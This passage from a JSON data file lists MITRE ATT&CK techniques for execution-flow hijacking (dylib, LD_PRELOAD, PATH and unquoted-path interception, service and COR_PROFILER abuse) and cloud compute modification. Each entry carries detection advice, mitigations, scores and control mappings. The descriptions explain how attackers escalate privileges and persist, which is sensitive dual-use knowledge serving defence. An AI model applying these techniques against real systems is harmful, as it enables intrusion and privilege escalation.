allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)", + "detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1574.005", + "name": "Hijack Execution Flow: Executable Installer File Permissions Weakness", + "url": "https://attack.mitre.org/techniques/T1574/005", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1574.006", + "name": "Hijack Execution Flow: Dynamic Linker Hijacking", + "url": "https://attack.mitre.org/techniques/T1574/006", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ", + "detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1574.007", + "name": "Hijack Execution Flow: Path Interception by PATH Environment Variable", + "url": "https://attack.mitre.org/techniques/T1574/007", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.", + "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1574.008", + "name": "Hijack Execution Flow: Path Interception by Search Order Hijacking", + "url": "https://attack.mitre.org/techniques/T1574/008", + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).", + "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1574.009", + "name": "Hijack Execution Flow: Path Interception by Unquoted Path", + "url": "https://attack.mitre.org/techniques/T1574/009", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.", + "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1574.010", + "name": "Hijack Execution Flow: Services File Permissions Weakness", + "url": "https://attack.mitre.org/techniques/T1574/010", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1574.011", + "name": "Hijack Execution Flow: Services Registry Permissions Weakness", + "url": "https://attack.mitre.org/techniques/T1574/011", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)", + "detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.", + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1574.012", + "name": "Hijack Execution Flow: COR_PROFILER", + "url": "https://attack.mitre.org/techniques/T1574/012", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1044", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "url": "https://attack.mitre.org/mitigations/M1044" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 2.5493619047619047, + "adjusted_score": 2.5493619047619047, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,16.13,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "RA-5", + "SI-10", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1578", + "name": "Modify Cloud Compute Infrastructure", + "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", + "url": "https://attack.mitre.org/techniques/T1578", + "tactics": [ + "Defense Evasion" + ], + "detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "platforms": [ + "IaaS" + ], + "data_sources": [ + "Instance: Instance Creation", + "Instance: Instance Deletion", + "Instance: Instance Modification", + "Instance: Instance Start", + "Instance: Instance Stop", + "Snapshot: Snapshot Creation", + "Snapshot: Snapshot Deletion", + "Snapshot: Snapshot Modification", + "Volume: Volume Creation", + "Volume: Volume Deletion", + "Volume: Volume Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1578.001", + "name": "Modify Cloud Compute Infrastructure: Create Snapshot", + "url": "https://attack.mitre.org/techniques/T1578/001", + "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)", + "detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1578.002", + "name": "Modify Cloud Compute Infrastructure: Create Cloud Instance", + "url": "https://attack.mitre.org/techniques/T1578/002", + "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.", + "detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1578.003", + "name": "Modify Cloud Compute Infrastructure: Delete Cloud Instance", + "url": "https://attack.mitre.org/techniques/T1578/003", + "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)", + "detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1578.004", + "name": "Modify Cloud Compute Infrastructure: Revert Cloud Instance", + "url": "https://attack.mitre.org/techniques/T1578/004", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "mitigations": [] + } + ], + "mitigations": [ + { + 